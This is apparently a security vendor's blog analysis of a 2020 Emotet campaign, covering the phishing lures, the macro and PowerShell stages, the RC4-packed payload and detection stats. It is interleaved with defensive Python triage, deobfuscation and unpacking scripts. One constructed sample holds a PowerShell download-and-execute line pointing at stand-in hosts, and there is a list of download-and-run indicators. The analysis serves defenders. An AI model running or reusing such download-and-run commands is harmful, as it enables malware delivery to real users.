The return of the Emotet as the world unlocks!
29 September 2020


Written by Prashant Tilekar
Cybersecurity, Emotet

Emotet, a banking trojan that grew into a malware distribution platform, has been in the wild for more than five years and is back after a five-month break. It has spread globally, infecting new as well as old targets, and has been relaunched with multiple malspam campaigns aimed at every sector.

Our detection telemetry shows that the new Emotet campaigns target a wide range of sectors. They spread through spam mail built around hot topics such as Covid-19 and a Covid-19 vaccine, plus generic lures such as Health Insurance, Payment, Invoice, Job Update/Opening, Cyberattack, Shipping and many more.

Infection chain

Fig 1: Infection chain

The infection chain starts with crafted emails sent to the target organization or person. The attacker uses email thread hijacking: mail stolen from already-compromised mailboxes is replied to, or forwarded to an existing contact list, with the malicious attachment added. Because the message arrives from a known sender and continues a real conversation, the victim opens the attachment without suspicion. The attachment is usually a Word document carrying a macro, or a PDF; sometimes the email body carries URLs instead.

We encountered a very large volume of such spam mails; a few examples are shown below.

Spam Mails

Fig 2. Example of Spam mails.

The attacker made an obvious mistake here: the subject and the attachment name do not match. In most cases the attachment is named "Medical report Covid-19" regardless of the hijacked thread it rides on.
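As an added example (not part of the original post and not Quick Heal's tooling), the script below turns those observations into mail-triage heuristics and runs them over a constructed message in the same style: a reply into an existing thread, an envelope sender that does not match the From domain, a macro-capable attachment whose name has nothing to do with the subject, and a real OLE2 container behind the .doc extension. The sample message, the finding labels and the word-length threshold are assumptions made for illustration.

```python
import email
import email.utils
import os
from email import policy

# Constructed sample in the style of the hijacked-thread mails above; it is not one of the real messages.
SAMPLE_EML = """\
Return-Path: <bounce@example.net>
From: "Accounts" <accounts@example.com>
To: victim@example.org
Subject: RE: Invoice 4471
In-Reply-To: <old-thread-id@example.org>
References: <old-thread-id@example.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see attached.
--b1
Content-Type: application/msword; name="Medical report Covid-19.doc"
Content-Disposition: attachment; filename="Medical report Covid-19.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuE=
--b1--
"""

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"                     # legacy Office (OLE2) container header
MACRO_EXTS = {".doc", ".dot", ".docm", ".dotm", ".xls", ".xlsm"}   # extensions that can carry VBA


def domain_of(header_value) -> str:
    """Lower-cased domain of an address header such as '"Name" <user@host>'; '' if absent."""
    _, addr = email.utils.parseaddr(str(header_value or ""))
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def triage(raw: str) -> list:
    """Return the heuristic findings (constructed labels) for one raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    subject = str(msg["Subject"] or "").strip()

    # 1. A reply/forward that references an older thread: the thread-hijacking pattern.
    if (msg["In-Reply-To"] or msg["References"]) and subject.lower().startswith(("re:", "fw:", "fwd:")):
        findings.append("reply-into-existing-thread")

    # 2. Envelope sender domain differs from the displayed From domain.
    rp, frm = domain_of(msg["Return-Path"]), domain_of(msg["From"])
    if rp and frm and rp != frm:
        findings.append("return-path-domain-mismatch")

    # Subject words we would expect to recur in a legitimate attachment name (assumed threshold: > 3 chars).
    subject_words = {w.lower() for w in subject.split() if len(w) > 3}

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = os.path.splitext(name)[1].lower()
        payload = part.get_payload(decode=True) or b""
        # 3. Macro-capable Office attachment, and whether the bytes really are an OLE2 file.
        if ext in MACRO_EXTS:
            findings.append("macro-capable-attachment")
            if payload.startswith(OLE_MAGIC):
                findings.append("ole2-container")
        # 4. Subject and attachment name share no meaningful word (the mismatch noted above).
        if name and subject_words and not any(w in name.lower() for w in subject_words):
            findings.append("subject-attachment-mismatch")
    return findings


if __name__ == "__main__":
    print(triage(SAMPLE_EML))
```

None of these signals is conclusive on its own (a genuine reply with an invoice also references an old thread), but several of them together on a message with a legacy .doc attachment is exactly the shape of the mails in Fig 2, and the check costs nothing at the gateway.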

Document Analysis

The Office document attachment contains a macro whose heavily obfuscated VBA code is responsible for delivering the next stage of the chain.

Fig 3. Macro code in an attachment.

After some de-obfuscation, the "Qndiwjphrk8an6x" function reduces to the following assignment (the concatenation exists only to hide the WMI moniker from simple string scanners):

Qndiwjphrk8an6x = "winmgmts" + ":win32_" + "p" + "rocess"

which evaluates to winmgmts:win32_process, the WMI class the macro uses to spawn the next stage. Once we removed the chunked junk data, the rest became readable code with named functions and variable references.

Another interesting item is the stream Macros\Ofbszpwp168r\o.stm inside the document's OLE container, which holds yet more obfuscated data.

Fig 4: Obfuscation in Doc file

After the initial level of de-obfuscation, we got the base64-encoded PowerShell script shown in the figure below.

Fig 5: base64 Encoded PowerShell code

After base64-decoding and cleaning up the data, we got the PowerShell script below:

Fig 6: Base64 Decoded PowerShell script

The script contains a list of malicious domains and URLs that serve the Emotet executable. Using PowerShell download commands, the executable is written to the "%temp%" directory on the victim's machine and launched.
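The two obfuscation layers just described, string concatenation in the VBA and a base64-encoded PowerShell stage, are mechanical to undo. The script below is an added example (not code from the original post) with constructed stand-ins for the macro and the PowerShell script; the function names, the example.com/example.net URLs and the indicator list are assumptions. It joins chained VBA literals such as "winmgmts" + ":win32_" + "p" + "rocess" back into one string, decodes the PowerShell as the UTF-16LE that -EncodedCommand expects, and pulls out the download URLs and the drop location.

```python
import base64
import re

# Constructed stand-ins for the artefacts in Figs 3-6 (not the real macro or script).
SAMPLE_VBA = (
    'Qndiwjphrk8an6x = "winmgmts" + ":win32_" + "p" + "rocess"\n'
    'Set ofbs = GetObject(Qndiwjphrk8an6x)\n'
    'ofbs.Create "powers" & "hell -w hidden -enc " & strEnc, Null, Null, pid\n'
)
SAMPLE_PS = (
    "$urls = 'http://example.com/wp-content/x/@http://example.net/files/y/'.Split('@');"
    "$out = $env:TEMP + '\\' + (Get-Random) + '.exe';"
    "foreach ($u in $urls) { try { (New-Object Net.WebClient).DownloadFile($u, $out);"
    " Invoke-Item $out; break } catch {} }"
)
# powershell -EncodedCommand takes base64 of UTF-16LE text, which is why the blob in Fig 5 looks the way it does.
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")

LITERAL = r'"((?:[^"]|"")*)"'                               # one VBA string literal ("" is an escaped quote)
CONCAT_RE = re.compile(LITERAL + r'(?:\s*[+&]\s*' + LITERAL + r')+')


def join_vba_strings(vba: str) -> str:
    """Collapse chains like "a" + "b" & "c" into a single literal, leaving the rest of the code untouched."""
    def repl(m):
        parts = re.findall(LITERAL, m.group(0))
        return '"' + "".join(p.replace('""', '"') for p in parts) + '"'
    return CONCAT_RE.sub(repl, vba)


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand blob; fall back to a byte-transparent decoding if it is not UTF-16LE."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


URL_RE = re.compile(r"https?://[^\s'\"@<>)]+", re.IGNORECASE)
# Constructed indicator list: cmdlets and tokens typical of a download-and-run stage.
SUSPICIOUS = ("webclient", "downloadfile", "downloadstring", "invoke-item",
              "start-process", "$env:temp", "bypass", "-enc")


def triage_powershell(b64: str) -> dict:
    """Decode the stage and pull out what an analyst needs: payload URLs, drop location, telltale cmdlets."""
    script = decode_encoded_command(b64)
    lowered = script.lower()
    return {
        "urls": URL_RE.findall(script),
        "indicators": [s for s in SUSPICIOUS if s in lowered],
        "drops_to_temp": "$env:temp" in lowered,
    }


if __name__ == "__main__":
    print(join_vba_strings(SAMPLE_VBA))
    print(triage_powershell(SAMPLE_B64))
```

The URL regex deliberately stops at "@" because the real scripts pack several URLs into one string and Split('@') them at runtime; the extracted list is what goes to blocking and to hunting in proxy logs.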

Payload Analysis

The payload downloaded by the script uses a custom packer, and unpacking happens at runtime. The packer code is polymorphic, which makes it difficult for signature-based tools to detect the sample from the packer code alone.

The resource (.rsrc) section holds an unusually large amount of data, which in itself suggests the file is packed. In the figure below, the RCData entry contains encrypted code.

Fig 7: File having encrypted data in resource

While debugging the file, we observed that this data is decrypted with a slightly modified version of RC4; the RC4 key is hardcoded in the file. After decryption, control passes to the decrypted shellcode.

Fig 8: RC4 used for decryption

In some files we have seen VirtualAllocExNuma used to allocate the new memory. Microsoft documents this API as NUMA-aware allocation (memory close to a given processor node); in malware it also doubles as a cheap sandbox check, since some emulators do not implement it and the call fails there. The beginning of the obfuscated shellcode is decrypted with the modified RC4 and copied to the newly allocated address. Besides the relatively short shellcode, an additional PE file can be seen in memory.

Fig 9: Decrypted shellcode and PE File

The shellcode resolves several APIs at runtime, such as LoadLibraryA, GetProcAddress, VirtualAlloc and VirtualProtect, and uses them to resolve the remaining imports and to allocate the memory in which the additional PE will run.

Fig 10: API Resolved

After this, the malware allocates memory, copies the decrypted file into it, sets the page protections with VirtualProtect and finally jumps to the real entry point of the decrypted file.
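As an added example (not the original post's code and not the malware's), here is the same unpacking sequence reproduced in Python against a constructed resource: measure the entropy of the RCData blob to confirm it looks encrypted, RC4-decrypt it with the hardcoded key, locate the embedded MZ/PE that follows the shellcode, and read AddressOfEntryPoint so you know where the final jump lands. The key, the 64 bytes of placeholder shellcode and the stub PE header are constructed; textbook RC4 stands in for Emotet's modified variant, which the post does not detail.

```python
import struct
from collections import Counter
from math import log2


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). Emotet's variant is 'slightly modified', so once the
    difference has been read out of the debugger this is the routine to patch."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: encrypted or compressed resources sit near 8, plain code or text well below."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def find_pe(data: bytes):
    """Offset of the first plausible PE image: an 'MZ' whose e_lfanew points at the PE signature."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if sig + 4 <= len(data) and data[sig:sig + 4] == b"PE\0\0":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return None


def entry_point_rva(image: bytes) -> int:
    """AddressOfEntryPoint is 16 bytes into the optional header for both PE32 and PE32+."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    optional_header = e_lfanew + 4 + 20            # PE signature + COFF file header
    return struct.unpack_from("<I", image, optional_header + 16)[0]


def unpack_resource(blob: bytes, key: bytes):
    """Mimic the unpacker: decrypt the RCData blob, find the embedded PE, report where execution resumes."""
    plain = rc4(key, blob)
    offset = find_pe(plain)
    if offset is None:
        return None
    image = plain[offset:]
    return {"offset": offset, "entry_rva": entry_point_rva(image), "image": image}


def build_stub_pe(entry_rva: int) -> bytes:
    """Constructed minimal PE32 header (DOS header, COFF header, optional header); not a real payload."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    optional = struct.pack("<HBBIIII", 0x10B, 14, 0, 0x200, 0, 0, entry_rva)
    return bytes(dos) + coff + optional + b"\0" * 0x100


# Constructed stand-in for the RCData entry in Fig 7: 64 bytes of placeholder 'shellcode' followed by the
# stub PE, RC4-encrypted under a key chosen here. The real key has to be read out of the sample in a debugger.
SAMPLE_KEY = b"example-hardcoded-key"
SAMPLE_RESOURCE = rc4(SAMPLE_KEY, b"\x90" * 64 + build_stub_pe(0x1234))

if __name__ == "__main__":
    print(f"resource entropy: {shannon_entropy(SAMPLE_RESOURCE):.2f} bits/byte")
    result = unpack_resource(SAMPLE_RESOURCE, SAMPLE_KEY)
    print(f"embedded PE at +0x{result['offset']:x}, entry point RVA 0x{result['entry_rva']:x}")
```

To run this on a real sample, replace SAMPLE_RESOURCE with the bytes of the RCData entry (for example via pefile's pe.get_data(rva, size)) and SAMPLE_KEY with the recovered key. If the output contains no PE, the modification to RC4 has not yet been ported into rc4(); the entropy check is the quick way to tell "still encrypted" from "decrypted but not a PE at offset zero".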

The spreading mechanism of this Emotet campaign remains almost the same as the one we discussed in our previous blog, linked below.

https://blogs.quickheal.com/evolution-4-year-old-threat-emotet-infamous-trojan-complex-threat-distributer/

Once Emotet is running, it sends collected data to its C&C server. The data is encoded and posted under a random file name and a random URI path.

Fig 11: CnC traffic

Detection hits stats

Quick Heal's products have successfully detected these Emotet trojans. Multiple detection layers, Email Protection, Online Protection and Behaviour Detection, protect our customers at different points of the infection chain.

The graph below shows the number of detection hits per day over the last 45 days.

Fig 12: Detection hits per day

Conclusion

Emotet is a persistent threat and highly successful at delivering email-based malware, with a major focus on stealing email and dropping additional malware. Its code is moderately obfuscated to deliver the payload and bypass detection.

With the global impact of COVID-19, threat actors are likely to continue to use COVID-19-themed emails to deliver malware broadly in support of their objectives for all sectors.

Quick Heal customers have long been protected from Emotet and from other COVID-19-themed email campaigns. We continue to track and report such attacks to keep our customers safe.

Subject Matter Experts:

Prashant Tilekar

Preksha Saxena


About Prashant Tilekar

Prashant Tilekar is part of the HIPS (Host-based Intrusion Prevention System) team in Quick Heal Security Labs. He has worked on various security vulnerabilities...
